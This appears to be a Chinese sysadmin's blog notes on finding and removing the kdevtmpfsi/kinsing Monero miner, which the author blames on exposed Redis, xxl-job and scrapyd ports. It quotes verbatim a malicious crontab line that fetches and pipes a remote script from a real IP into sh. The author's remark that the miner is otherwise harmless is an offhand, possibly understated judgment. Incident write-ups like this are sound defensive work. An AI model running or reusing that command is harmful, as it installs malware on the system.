今天下午,接到电话说网站打不开了,后台一看,java admin服务的进程没了,但没有dump文件,没有error_<pid>文件,/var/log/messages也查不到linux主动kill的日志,dmesg命令也查不到和java相关的记录。这下有点头大,都不知从何查起。
----------------------------
ps
今天接到腾讯云的警告:检测到存在未处理的 /tmp/kdevtmpfsi 木马文件.这是一个挖门罗币程序,登上服务器查看,果然cup100%,后台有个kdevtmpfsi,kinsing的进程。把进程kill了,crontab -l 查看定时脚本,有个定时任务
wget -q -O - http://195.3.146.118/unk.sh |sh, crontab -r清除任务,然后删除/tmp/kdevtmpfsi,/tmp/kinsing. 发现服务器的可用内存也增加了1G多. 可不用多久,目录里的kdevtmpfsi,kinsing又回来了,于是看了一下,把一个可疑的libsystem.so文件也删除,然后把redis改成bind 127.0.0.1,参照 https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.2.828c1848kuRv6p。可是还是不行,过一会还是出问题,继续查找,发现xxl-job的漏洞会有此问题,https://help.aliyun.com/noticelist/articleid/1060736995.html?spm=5176.2020520154.sas.52.e96d1e430g70fo,https://www.sohu.com/a/443033408_465935。我印象中也确实是上线了xxl-job就出问题了。于是参照提示的加上token。再看看会不会还有问题。
黑客是怎么知道我装了xxl的?也许是扫描端口猜的吧,真是防不胜防,还好这貌似是个单纯的挖矿程序。
不清楚前面的java进程消失和这个病毒有没有关系
----------------------------
ps
这次这个病毒又来了,收到腾讯云的警告,一看后台,kdevtmpfsi,kinsing这两个进程又来了,因为昨晚才升级装了scrapyd,开放了6800端口,没设密码,这么快又中招了。kill进程,删crontab任务,删文件啊,还有一个/tmp/.ICEd-unix的伪装目录。
看来黑客也有个任务在扫描端口,然后自动化侵入,挖矿,还好这病毒没有别的坏处,就是来占用资源。黑客只是求财,没有蓄意破坏。